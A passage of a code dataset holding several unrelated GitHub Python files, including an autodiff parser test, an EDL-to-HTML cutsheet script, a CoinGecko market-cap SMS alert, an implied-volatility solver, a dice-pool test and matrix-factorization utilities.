Mean.append(Meanprofile)\r\n Meanprofile=pd.concat(Mean,axis=0)\r\n \r\n outputlocation=Inputfolder+\"/\"+Nameoutput+\"mean.xlsx\"\r\n writer = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\n Meanprofile.to_excel(writer, sheet_name='Sheet1')\r\n writer.save()\r\n\r\n#%%Output\r\noutputlocation=Inputfolder+\"/\"+Nameoutput+\".xlsx\"\r\nwriter = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\ndf.to_excel(writer, sheet_name='Sheet1')\r\nwriter.save()\r\n\r\n\r\nif Headeroutput==1:\r\n outputlocation=Inputfolder+\"/\"+Nameoutput+\"Header.xlsx\"\r\n writer = pd.ExcelWriter(outputlocation, engine='xlsxwriter')\r\n header.to_excel(writer, sheet_name='Sheet1')\r\n writer.save()","repo_name":"thmeijerink/Density-profile-processor","sub_path":"Densityprofiledl1reader.py","file_name":"Densityprofiledl1reader.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18869276267","text":"import pytest\nfrom autodiffcc.ADmath import *\nfrom autodiffcc.core import AD\nfrom autodiffcc.parser import expressioncc\n\ndef test_log():\n fn = expressioncc('3 * log(x,2) + sin(7)', ['x']).get_fn()\n t1 = fn(AD(4, n_vars=1))\n assert t1.val == pytest.approx(6.6569866)\n assert t1.der == pytest.approx(1.08202128)\n\ndef test_equation():\n fn = expressioncc('3 * log(x,2) = - sin(7)', ['x']).get_fn()\n t1 = fn(AD(4, n_vars=1))\n assert t1.val == pytest.approx(6.6569866)\n assert t1.der == pytest.approx(1.08202128) \n\ndef test_multi_var():\n fn = expressioncc('log(x,2) + sin(y)', ['x', 'y']).get_fn()\n x = AD(4, der = [1, 0])\n y = AD(3, der = [0, 1])\n t1 = fn(x,y)\n assert t1.val == pytest.approx(2.1411200080598674)\n assert t1.der.tolist() == [pytest.approx(0.36067376), pytest.approx(-0.9899925)] ","repo_name":"Crimson-Computing/cs207-FinalProject","sub_path":"build/lib/tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31158116161","text":"import codecs\nimport pandas as pd\nimport cv2\nimport os\nimport math\nimport html\nfrom flask import Flask,render_template,url_for\n\nfrom pandas.core import frame\n\npd.set_option('colheader_justify', 'center')\n\n\n\n#####\nframeRateList = [60,30,24]\nfile_url = input(\"EDL file path---> \")\n\nif os.path.exists(file_url):\n pass\nelse:\n print(\"FILE DOES NOT EXIST!\")\n exit()\n\nvideoPath = input(\"VIDEO file path---> \")\n\nif os.path.exists(videoPath):\n pass\nelse:\n print(\"FILE DOES NOT EXIST!\")\n exit()\n\nfolderPath = os.path.dirname(videoPath)\nin_frameRate = input('FrameRate?---> ')\nframeRate = int(round(float((in_frameRate))))\nif frameRate in frameRateList:\n pass\nelse:\n print(\"INVALID FRAME RATE!\")\n exit()\n\n\nprjName = input('Enter Project Name--->')\n\nhtml_string = '''\n\n CUTSHEET\n \n \n {table}\n \n.\n'''\ndef TCtoFrame(frameRate,time):\n frameNum = 0\n sepTime = time.split(\":\")\n frameNum = (frameRate * 60 * int(sepTime[1])) +(frameRate*int(sepTime[2])) + int(sepTime[3])\n return frameNum\n\ndef EDLParser(edl_file,frameRate):\n #空のデータフレームを作成\n df = pd.DataFrame({\n 'THUMBNAIL':[],\n 'FILE_NAME':[],\n 'IN_TIME':[],\n 'OUT_TIME':[],\n 'IN_FRAME':[],\n 'OUT_FRAME':[]})\n\n f = codecs.open(edl_file,'r','shift-jis','ignore')\n lines = f.read().split('\\n') #改行コードでParse\n for i, line in enumerate(lines):\n if i == 0:\n previous_line = None\n else:\n previous_line = lines[i - 1]\n\n if i == len(lines) -1:\n next_item = None\n else:\n next_item = lines[i + 1]\n try:\n if lines[i].split()[2] in \"V\": #ビデオレイヤのデータのみ抽出\n thumbnail_path = None\n file_name = next_item.split(\":\")[1].strip(\"\\r\") #ファイル名\n in_time = lines[i].split()[6]\n out_time = lines[i].split()[7]\n in_frame = TCtoFrame(frameRate,in_time)\n out_frame = TCtoFrame(frameRate,out_time)\n addRow = pd.DataFrame([thumbnail_path,file_name,in_time,out_time,in_frame,out_frame],index=df.columns).T\n df = df.append(addRow,ignore_index=True)\n except IndexError as e:\n pass\n return df\n\ndef saveFrame(videoPath, frame_num, result_path):\n cap = cv2.VideoCapture(videoPath)\n \n if not cap.isOpened():\n return\n os.makedirs(os.path.dirname(result_path),exist_ok=True)\n\n cap.set(cv2.CAP_PROP_POS_FRAMES, frame_num)\n ret, frame = cap.read()\n\n if ret:\n cv2.imwrite(result_path,frame)\n\n\ndef executeSaveFrame(dataFrame):\n for i in range(len(dataFrame)):\n result_path = f'{folderPath}/image/{prjName}_{str(i).zfill(4)}.jpg'\n dataFrame.iat[i,0] = f''\n frame_num = math.floor((dataFrame.iloc[i,4]+dataFrame.iloc[i,5])*0.5)\n saveFrame(videoPath,frame_num,result_path)\n\ndf = EDLParser(file_url,frameRate)\nexecuteSaveFrame(df)\n# print(df)\n\nwith open(f'{folderPath}/myhtml.html', 'w') as f:\n f.write(html_string.format(table=df.to_html(classes='mystyle',escape=False)))\n print(\"----DONE----\")\n","repo_name":"UKYOINABA/EDL-to-HTML","sub_path":"EDLtoHTML.py","file_name":"EDLtoHTML.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9269866009","text":"# -*- coding: utf-8 -*-\n\nimport sys, os\n\n\n# -- General configuration -----------------------------------------------------\n\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx.ext.todo']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'breaking-deps'\ncopyright = u'2015, Povilas Balciunas'\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = '0.1.0'\n# The full version, including alpha/beta/rc tags.\nrelease = '0.1.0'\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'breaking-deps',\n u'dependency breaking techniques from the book '\n '\"Working effectively with legacy code\" by Michael C. Feathers.',\n [u'Povilas Balciunas'], 1)\n]\n","repo_name":"povilasb/breaking-dependencies-man","sub_path":"src/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36492437268","text":"from pycoingecko import CoinGeckoAPI\nimport numpy as np\nimport pandas as pd\nimport json\nfrom datetime import datetime, timedelta\nimport time\nimport csv\nimport sys\n\nfrom twilio.rest import Client\n\naccount_sid = ''\nauth_token = ''\nfrom_tel = '+12223334444'\nto_tel = '+12223334444'\n\n\nwith open('auth.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n account_sid = csv_reader.fieldnames[0]\n auth_token = csv_reader.fieldnames[1]\n from_tel = csv_reader.fieldnames[2]\n to_tel = csv_reader.fieldnames[3]\n\ntwilio_client = Client(account_sid, auth_token)\n \n\nfilter_file = 'filter.csv'\n\nif len(sys.argv) > 1:\n filter_file = sys.argv[1]\n\nfilter = []\nwith open(filter_file, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for entry in csv_reader.fieldnames:\n filter.append(entry)\n\ncg = CoinGeckoAPI()\n\nmcap_recent_snapshot = {}\n\n#populate an initial mcap snapshot\nmarkets_snapshot = cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=1)\nmarkets_snapshot += cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=2)\nfor entry in markets_snapshot:\n mcap_recent_snapshot[entry['symbol']] = entry['market_cap_rank']\n\niteration = 0\nwhile True:\n print(iteration)\n time.sleep(60*15)\n\n markets_snapshot = cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=1)\n markets_snapshot += cg.get_coins_markets(vs_currency='usd', order=\"market_cap_desc\", per_page=250, page=2)\n\n sms_alert_msg = \"\"\n\n for entry in markets_snapshot:\n try:\n if mcap_recent_snapshot[entry['symbol']] != entry['market_cap_rank']:\n if entry['symbol'] in filter:\n sms_alert_msg += f\"\\n{entry['symbol']} {mcap_recent_snapshot[entry['symbol']]} -> {entry['market_cap_rank']}\"\n except KeyError:\n print (entry['symbol'])\n mcap_recent_snapshot[entry['symbol']] = entry['market_cap_rank']\n \n if sms_alert_msg != \"\":\n print(sms_alert_msg)\n twilio_client.messages .create(\n body = f\"!!!MCAP ALERT!!!\\n{sms_alert_msg}\",\n from_ = from_tel,\n to = to_tel)\n \n iteration += 1\n \nprint('done')","repo_name":"antoineMica/CoinGeckoPuller","sub_path":"MCapAlert.py","file_name":"MCapAlert.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37042717119","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 19:26:06 2018\n\n@author: songqsh\n\"\"\"\n\n\nfrom scipy import optimize\nimport BsmOption as BO\n\ndef IVol(Option, MarketPrice):\n \"\"\"\n Inputs:\n ======= \n Option: BO.BsmEuOptions class\n MarketPrice: float, price quoted from market\n Outputs:\n ========\n float,\n Implied volatility\n \"\"\"\n InitVol = .3\n error = lambda vol: (Option.BsmPrice(vol) - MarketPrice)**2\n opt = optimize.fmin(error, InitVol, disp = False);\n return opt[0]\n\n\n \nif __name__ == \"__main__\":\n iOpt = BO.BsmEuOptions(\\\n Spot = 290.68, Strike = 288, Rate = 0.02, \\\n Vol = 0.3, Maturity = 1/12, Type = 'Call'\\\n )\n MarketPrice = 9.23\n print('Implied Volatility is', IVol(iOpt, MarketPrice))","repo_name":"shuyueliu/MA6628_Homework","sub_path":"IVol.py","file_name":"IVol.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70975458185","text":"import sys\nsys.path.append(\"../..\")\nsys.path.append(\"../../functions\")\nsys.path.append(\"../game_states\")\nsys.path.append(\"../ddm_dice\")\nsys.path.append(\"../dungeon_objects\")\nimport settings\nfrom logger import Logger\nfrom dice_list import DiceList\nfrom dice_pool import DicePool\n\nprint(\"Welcome to the dice pool test.\\n\\n\\\nHere you can fill a dice pool with dice from a library, and\\n\\\ndisplay the results.\")\n\nprint(\"\\n\\\nInput dl to display the library.\\n\\\nInput dl to display a dice from the library.\\n\\\nInput dp to display the dice pool.\\n\\\nInput dp to display a dice from the dice pool.\\n\\\nInput a to add a dice from the library to the pool.\\n\\\nInput r to remove a dice from the pool.\\n\\\nInput f to fill the dice pool with random dice.\\n\\\nInput q to quit.\\n\")\n\nlog = Logger()\nlibrary = DiceList(\"library\", log)\nsettings.library_path = (\"../../databases/library.yaml\")\nlibrary.fill_from_library()\npool = DicePool(log)\n\ndef get_dicenum(string):\n try:\n return int(string)\n except ValueError:\n print(\"Couldn't interpret the dice number.\\n\")\n return None\n\nwhile True:\n command = input(\">\")\n \n if command == \"q\":\n break\n \n # display something\n if command[0] == \"d\":\n if len(command) <= 1: # special case of invalid cmd\n print(\"\\n\")\n continue\n if command[1] == \"l\": # display library\n set = library \n elif command[1] == \"p\": # display pool\n set = pool\n else: # skip\n continue\n if len(command) == 2: # print the whole set\n print(set.stringify() + \"\\n\")\n\n else: # print a specific dice\n dicenum = get_dicenum(command[2:])\n if not dicenum: \n continue\n dice = set.get(dicenum)\n if dice:\n print(dice.stringify() + \"\\n\")\n else:\n print(set.log.flush())\n\n # add dice to pool\n elif command[0] == \"a\":\n # get dice number from command\n dicenum = get_dicenum(command[1:])\n if dicenum is None: \n continue\n\n # get dice from library\n dice = library.get_copy(dicenum)\n if not dice:\n print(library.log.flush())\n continue\n\n # add dice to pool\n success = pool.add(dice)\n if success:\n print(\"Dice added to pool.\\n\")\n else:\n print(pool.log.flush())\n \n # remove dice from dice pool\n elif command[0] == \"r\":\n # get dice number from command\n dicenum = get_dicenum(command[1:])\n if dicenum is None: \n continue\n\n # remove dice from pool\n dice = pool.remove_idx(dicenum)\n if dice:\n print(\"Dice removed to pool.\\n\")\n else:\n print(pool.log.flush())\n\n # fill with random dice\n elif command == \"f\":\n pool.fill_random()\n print(\"Dice pool filled.\\n\")\n\nprint(\"Bye!\")\n","repo_name":"francocurotto/YDDM-re-old","sub_path":"source/game_logic/ddm_list/test_dice_pool.py","file_name":"test_dice_pool.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37091893099","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import bernoulli\nfrom scipy.stats import ortho_group # Requires version 0.18 of scipy\nfrom copy import deepcopy\nfrom matplotlib import rc\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import Lasso,Ridge, LinearRegression,orthogonal_mp,Lars\nfrom scipy.linalg import orth\nfrom scipy.interpolate import interp1d\nfrom scipy import interpolate\nfrom sklearn.decomposition import SparsePCA\n\nfrom sklearn.cluster import KMeans\n\ndef warn(*args, **kwargs):\n pass\nimport warnings\nwarnings.warn = warn\n\n#################### Factorization Functions ######################\n\n#norm = 'envs', 'loci', 'mods_W', 'mods_M'\n#method_M = 'Lasso', 'Lars', 'Ridge', 'OMP'\n#method_W = 'Lasso', 'Ridge'\n#mask = None or a Boolean matrix with the shape of F specifying which values are missing (True = present, False = missing)\n\n\n\ndef run_factorizer_regularized_range(F, K, lamb1s, lamb2s , method_M = 'Lasso', method_W = 'Lasso', norm = 'envs', verbose=True, mask = None, \\\nM_lb=1e-3, W_lb = 1e-3, fit_intercept = False): #add \"all\" option by default\n #SVD\n u,s,vh = np.linalg.svd(F - fit_intercept*np.mean(F,axis=0))\n u_K = u[:,:K]\n s_K = s[:K]\n vh_K = vh[:K]\n\n to_return = None\n if verbose:\n print(\"Kmax lambW lambM error_ours error_svd K av.proc./loci av.proc./env loci dropped grassmann to svd\")\n our_errs = []\n mods = []\n ndls = []\n Ws = np.zeros((len(lamb1s),len(lamb2s),F.shape[0],K))\n Ms = np.zeros((len(lamb1s),len(lamb2s),K,F.shape[1]))\n bs = np.zeros((len(lamb1s),len(lamb2s),F.shape[1]))\n for il1, lamb1 in enumerate(lamb1s):\n for il2,lamb2 in enumerate(lamb2s):\n if fit_intercept:\n b = np.mean(F,axis=0)\n else:\n b = np.zeros(F.shape[1])\n\n if norm == 'loci' or norm == 'mods_M':\n M = np.zeros((Ms.shape[2],Ms.shape[3]))\n M = deepcopy(vh_K)\n W = np.matmul(F - np.mean(F,axis=0),M.T)\n else:\n W = np.zeros((Ws.shape[2],Ws.shape[3]))\n W = deepcopy(u_K)\n M = np.matmul(W.T,F - np.mean(F,axis=0))\n\n \n for i in range(5):\n if i%1==0:\n err_EM = np.mean((F - np.matmul(W,M) - b)**2)\n err_SVD = np.mean((F - np.matmul(u_K,s_K[:,None]*vh_K) - fit_intercept*np.mean(F,axis=0))**2)\n\n W,M,b = optimize(F,W,M,lamb1,lamb2, method_M = method_M, method_W = method_W, norm = norm, mask = mask, fit_intercept = fit_intercept, b=b)\n # truncate\n W = (np.abs(W)> W_lb)*W\n M = (np.abs(M)> M_lb)*M\n\n if fit_intercept == False:\n b = np.zeros(F.shape[1])\n\n Ws[il1,il2] = W\n Ms[il1,il2] = M\n bs[il1,il2] = b\n \n #compute L2 error\n err_EM = np.mean((F - np.matmul(W,M) - b)**2)\n err_SVD = np.mean((F - np.matmul(u_K,s_K[:,None]*vh_K) - fit_intercept*np.mean(F,axis=0))**2)\n grass = grassmann(M,vh_K)\n\n #compute modularity\n ndl = dropped_loci(M)\n nde = dropped_envs(W)\n mod = ave_mod_per_loci(M)\n mode = ave_mod_per_env(W)\n \n mods.append(mod)\n ndls.append(ndl)\n our_errs.append(err_EM)\n \n if verbose:\n if norm == 'loci' or norm == 'mods_M': keff = int(np.ceil(np.sum(M**2)))\n else: keff = int(np.ceil(np.sum(W**2)))\n print(f\"{K:2d} {lamb1:.4f} {lamb2:.4f} {err_EM:.3f} {err_SVD:.3f} {keff:2d} {mod:.3f} {mode:.3f} {ndl:3d} {grass:.3f}\") \n \n return Ws, Ms, bs, mods, ndls\n\n\n\ndef optimize(F,W,M,lamb1,lamb2, method_M = 'Lasso', method_W = 'Lasso', norm = 'envs', mask = None, fit_intercept = False, b = None, niters = 5): \n if mask is None:\n mask = np.ones(F.shape,dtype = bool)\n\n if fit_intercept == True and b is None:\n raise ValueError(\"need b\")\n\n for i in range(niters):\n M,b = optimize_M(F,W,lamb2,method = method_M, norm = norm, mask = mask, fit_intercept = fit_intercept)\n W = optimize_W(F,M,lamb1,method = method_W, norm = norm, mask = mask, fit_intercept = fit_intercept, b = b)\n \n return W,M,b\n\n\ndef optimize_M(F,W,lamb2, method = 'Lasso', norm = None, mask = None, fit_intercept = False): #norm = 'loci' or norm = 'mods_M' or norm = None\n if mask is None:\n mask = np.ones(F.shape,dtype = bool)\n M = np.zeros((W.shape[1],F.shape[1]))\n\n M2_1= np.sum(np.sum(M**2,axis=1) > 1e-6)\n\n b = np.mean(F,axis=0)\n for i in range(F.shape[1]):\n if method == 'Ridge':\n clf = Ridge(alpha = lamb2, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n elif method == 'Lasso':\n clf = Lasso(alpha = lamb2, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n elif method == 'Lars':\n clf = Lars(n_nonzero_coefs=lamb2, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n elif method == 'OMP':\n M[:,i] = orthogonal_mp(W[mask[:,i]],F[mask[:,i],i],n_nonzero_coefs = lamb2)\n else:\n clf = Ridge(alpha = 1e-5, fit_intercept = fit_intercept)\n clf.fit(W[mask[:,i]],F[mask[:,i],i])\n M[:,i] = clf.coef_\n b[i] = clf.intercept_\n\n M2_2 = np.sum(np.sum(M**2,axis=1) > 1e-6)\n\n if norm == 'loci':\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=1))[:,None])\n elif norm == 'mods_M':\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=0))[None,:])\n\n M2_3 = np.sum(np.sum(M**2,axis=1) > 1e-6)\n\n return M,b\n\ndef optimize_W(F,M,lamb1, method = 'Lasso', norm = 'envs', mask = None, fit_intercept = False, b = None): #norm = 'envs' or 'mods_W' or 'None'\n if mask is None:\n mask = np.ones(F.shape,dtype = bool)\n\n if fit_intercept == True and b is None:\n raise ValueError(\"need b\")\n\n if fit_intercept == False:\n b = np.zeros(F.shape[1])\n\n K = M.shape[0]\n W = np.zeros((F.shape[0],M.shape[0]))\n for e in range(F.shape[0]):\n if method == 'Lasso':\n clf = Lasso(alpha = lamb1, fit_intercept = False)\n clf.fit(M[:,mask[e,:]].T,F[e,mask[e,:]] - fit_intercept*b[mask[e,:]])\n W[e,:] = clf.coef_\n else:\n clf = Ridge(alpha = lamb1, fit_intercept = False)\n clf.fit(M[:,mask[e,:]].T,F[e,mask[e,:]] - fit_intercept*b[mask[e,:]])\n W[e,:] = clf.coef_\n \n if norm == 'envs':\n W = W/(1e-9+np.sqrt(np.sum(W**2,axis=0))[None,:]) #normalize across environments\n elif norm == 'mods_W':\n W = W/(1e-9+np.sqrt(np.sum(W**2,axis=1))[:,None]) #normalize across modules\n \n return W\n\n\n\ndef ptk(l,r = 4): #parameter to key\n return round(l,r)\n\n\ndef cluster_kmeans(M,Kp, rs = 1 ):\n norms = np.sqrt(np.sum(M**2,axis=0))\n filt = norms > 1e-6\n Mfilt = deepcopy(M[:,filt])\n M_norm = Mfilt#/norms[filt]\n \n kmeans = KMeans(n_clusters=Kp, random_state=rs).fit(M_norm.T)\n D = kmeans.cluster_centers_.T\n P = np.zeros((Kp,M_norm.shape[1]))\n for i in range(M_norm.shape[1]):\n P[kmeans.labels_[i],i] = 1#norms[i]\n \n P_final = np.zeros((Kp,M.shape[1]))\n labels_final = np.zeros(M.shape[1],dtype= int) - 1\n \n inds= np.arange(M.shape[1])[filt]\n P_final[:,inds] = deepcopy(P)\n labels_final[inds] = kmeans.labels_\n \n return D,P_final, labels_final\n\ndef optimize_TDP(F,M,W,b,Kp, lamb1, lamb2, niter = 8, verbose = False):\n Mhat = deepcopy(M)\n bhat = deepcopy(b)\n That = deepcopy(W)\n K = W.shape[1]\n Ferr_M = np.mean((F - W@M - b)**2)\n Ts = np.zeros((niter,W.shape[0],K))\n Ds = np.zeros((niter,K,Kp))\n Ps = np.zeros((niter,Kp,M.shape[1]))\n errs = np.zeros(niter)\n for i in range(niter):\n #get D,P\n T = deepcopy(That)\n D,P,l = cluster_kmeans(Mhat,Kp, rs = i)\n Mhat = D@P\n Merr = np.mean((M - Mhat)**2)/(np.std(M)**2)\n Ferr_Mhat = np.mean((F - That@Mhat - bhat)**2)\n \n #get TD\n #TDhat = ((F-bhat)@np.linalg.pinv(P))\n TDhat = That@D\n \n Ferr_TDhat = np.mean((F - TDhat@P - bhat)**2)\n \n #decompose TD\n # u,s,vh = np.linalg.svd(TDhat)\n # u_K = u[:,:K]\n # s_K = s[:K]\n # vh_K = vh[:K]\n # D = deepcopy(vh_K)\n # T = np.matmul(TDhat,D.T)\n # T,D,_ = optimize(TDhat,T,D,lamb1,lamb2, norm = \"mods_M\", niters = 10)\n \n # TD = T@D\n TDerr = 0\n #TDerr = np.mean((TD - TDhat)**2)/(np.std(TDhat)**2)\n #P,_ = em.optimize_M(F - bhat,TD,1,method = \"OMP\")\n #P = np.linalg.pinv(TD)@(F-bhat)\n\n T = ((F-bhat)@np.linalg.pinv(D@P))\n\n #Ferr_TDPhat = np.mean((F - TDhat@P - bhat)**2)\n \n #Mhat = np.linalg.pinv(T)@(F-bhat)\n Mhat,_ = optimize_M(F-bhat,T,lamb2,norm = \"loci\", fit_intercept=False)\n That = deepcopy(T)\n T = deepcopy(That)\n\n Ferr_TDPhat = np.mean((F - (T@D)@P - bhat)**2)\n\n\n Ts[i] = T\n Ds[i] = D\n Ps[i] = P\n errs[i] = Ferr_TDPhat\n \n if verbose:\n print(\"%02d %.4f %.4f %.4f %.4f %.4f %.4f\" %(Kp, Merr, Ferr_M, Ferr_Mhat, Ferr_TDhat, TDerr, Ferr_TDPhat))\n\n minner = np.argmin(errs)\n T = Ts[minner]\n D = Ds[minner]\n P = Ps[minner]\n if verbose:\n print(\"TDP: %02d %.3f\" %(Kp, errs[minner]))\n\n return T,D,P,errs[minner]\n\ndef run_svd(F, K, M_lb=0, W_lb=0):\n u,s,vh=np.linalg.svd(F)\n W, M = u[:,:K]*s[None,:K], vh[:K]\n W = (np.abs(W)> W_lb)*W\n M = (np.abs(M)> M_lb)*M\n return M, W\n\ndef dropped_loci(M):\n K = M.shape[0]\n nzl = np.abs(np.sum(M, axis = 0)) > 0\n ndl = len(nzl)-sum(nzl)\n return ndl\n\ndef dropped_envs(W):\n K = W.shape[1]\n nze = np.abs(np.sum(W, axis = 1)) > 0\n nde = len(nze)-sum(nze)\n return nde\n\n\ndef grassmann(A,B, mode = \"squares\"): #A, B are K x L\n if np.sum(np.abs(A)) == 0 or np.sum(np.abs(B)) == 0:\n return np.sqrt(A.shape[0]*np.pi**2)\n Ma = orth(A.T)\n Mb = orth(B.T)\n Q = Ma.T @ Mb\n\n u,s,vh = np.linalg.svd(Q)\n if mode == \"squares\":\n s = (s>=1)*np.ones(len(s)) + (s<1)*s\n return np.sqrt(np.sum(np.arccos(s)**2))\n elif mode == \"cosines\":\n return np.sum((1-s)/2)\n \ndef ave_mod_per_loci(M):\n K = M.shape[0]\n nzl = np.abs(np.sum(M, axis = 0)) > 0\n return np.mean(np.sum(np.abs(M[:, nzl])>0,axis=0)) # doesn't include dropped loci\n\ndef ave_mod_per_env(W):\n K = W.shape[1]\n nze = np.abs(np.sum(W, axis = 1)) > 0\n return np.mean(np.sum(np.abs(W[nze, :])>0,axis=1)) # doesn't include dropped envs\n\ndef get_attributes_of_solns(fct_F, mode = 'reg'):\n mods = []\n keffs = []\n errors = []\n ave_part_in = []\n l1s = []\n l2s = []\n if fct_F.init_mode == \"FXY\":\n T_errors = []\n V_errors = []\n ks = []\n ave_mod_per_env = []\n for p in fct_F.computed_params(printout=False):\n if p[0]!=mode: continue\n l1s.append(p[2][0])\n l2s.append(p[2][1])\n ks.append(p[1])\n keffs.append(int(np.ceil(np.sum(fct_F.M_preds[p]**2))))\n mods.append(fct_F.modularities[p])\n errors.append(np.mean(fct_F.L2FFs[p]))\n ave_part_in.append(ave_mod_per_loci(fct_F.M_preds[p])) # doesn't include dropped loci\n ave_mod_per_env.append(ave_mod_per_loci(fct_F.W_preds[p].T)) # doesn't include dropped loci\n\n if fct_F.init_mode == \"FXY\":\n T_errors.append(np.mean(fct_F.R2Ts[p]))\n V_errors.append(np.mean(fct_F.R2Vs[p]))\n print(p, ks[-1], keffs[-1], errors[-1], ave_part_in[-1])\n atts= {}\n atts[\"modularity\"] = mods\n atts[\"ave modules / loci\"]= ave_part_in\n atts[\"ave modules / env\"]= ave_mod_per_env\n atts[\"keff\"] = keffs\n atts[\"error\"] = errors\n atts[\"k\"] = ks\n atts[\"lamb1\"] = l1s\n atts[\"lamb2\"] = l2s\n if fct_F.init_mode == \"FXY\":\n atts[\"training variance explained\"] = T_errors\n atts[\"validation variance explained\"] = V_errors\n\n return atts\n\ndef plot_attributes(atts, x_key, y_key, color_key, filter_type=None, filter_range =None, cmap = \"Dark2\", title = None, xrange = None, yrange = None, crange = None):\n if filter_type is not None:\n xs, ys, cs = [], [], []\n for _, x in enumerate(atts[filter_type]):\n if x>filter_range[0] and x< filter_range[1]:\n xs.append(atts[x_key][_])\n ys.append(atts[y_key][_])\n cs.append(atts[color_key][_])\n else:\n xs, ys, cs = atts[x_key], atts[y_key], atts[color_key]\n if crange is None:\n plt.scatter(xs,ys, c = cs, cmap = cmap)\n else:\n plt.scatter(xs,ys, c = cs, cmap = cmap, vmin = crange[0], vmax = crange[1])\n\n if xrange is not None: plt.xlim(xrange)\n if yrange is not None: plt.ylim(yrange)\n plt.xlabel(x_key)\n plt.ylabel(y_key)\n if title is not None: plt.title(title)\n cbar = plt.colorbar()\n cbar.set_label(color_key)\n plt.grid()\n plt.show()\n \n\n################### Functions for generating synthetic F = WM + c ###########################\n\ndef get_W_and_M_structured(h, H, p, L, hub_sparsity, M_sparsity, rho, seed = 0):\n #there are h hub envs with p possible perturbations to each. rho sets magnitude of the perturbation, Total of h*(p+1) possible environments. \n #1 core trait which affects all environments, H hub modules, p perturbation modules. K = 1 + H + p\n \n if M_sparsity is None: M_sparsity = 1\n if hub_sparsity is None: hub_sparsity = 1\n np.random.seed(seed)\n\n E = int(h*(1+p))\n K = int(H + p)\n\n W = np.zeros((E,K))\n\n for e in range(h): #for each hub env\n filt_hub = np.random.uniform(size = (H)) < hub_sparsity # hub-module membership \n modules_hub = np.zeros(K,dtype=int)\n modules_hub[:H][filt_hub] = 1\n\n Whub = np.random.randn(K)\n #Whub = np.ones(K)\n\n W[e*(1+p),:] = Whub*modules_hub #hub environment\n\n for n in range(p):\n modules_pert = deepcopy(modules_hub)\n modules_pert[H+n] = rho\n W[e*(1+p) + n + 1, :] = Whub*modules_pert\n \n \n filt = np.random.uniform(size = (K,L)) < M_sparsity # loci-module membership\n M = filt*np.random.randn(K,L) # weights are iid normal\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=1))[:,None]) # normalize so each module has norm 1\n \n F = W @ M\n \n # chose magnitude of C (is one std of means across loci)\n locs = np.mean(F ,axis=0)\n mag_locs = np.std(locs)\n \n C = mag_locs*np.random.randn(L)\n\n return W,M,C\n\n\ndef get_W_and_M_simple(E,L,K, M_sparsity, W_sparsity, seed = 0):\n # E = envs\n # L = loci\n # K = modules\n # M_sparsity = bernoulli prob of each loci in each module; 1 if None\n # W_sparsity = bernoulli prob of each env using each module; 1 if None\n \n np.random.seed(seed)\n\n if M_sparsity is None: M_sparsity = 1\n if W_sparsity is None: W_sparsity = 1\n \n filt = np.random.uniform(size = (E,K)) < W_sparsity\n W = filt*np.random.randn(E,K) # weights are iid normal\n \n filt = np.random.uniform(size = (K,L)) < M_sparsity # loci-module membership\n M = filt*np.random.randn(K,L) # weights are iid normal\n M = M/(1e-9+np.sqrt(np.sum(M**2,axis=1))[:,None]) # normalize so each module has norm 1\n \n F = W @ M\n \n # chose magnitude of C (is one std of means across loci)\n locs = np.mean(F ,axis=0)\n mag_locs = np.std(locs)\n C = mag_locs*np.random.randn(L)\n\n return W,M,C\n\n\n############### OLD (PROBABLY DELETE) ####################\n\n\n#plots the dot product similarity between W vectors amongst themselves and with singular vectors\ndef plot_dots(F,W, savefile= None, compare = \"w\"): #compare = \"w\" or \"u\" for Ws and SVD resp.\n K = W.shape[1]\n\n u,s,vh=np.linalg.svd(F)\n\n u_K = u[:,:K]\n s_K = s[:K]\n vh_K = 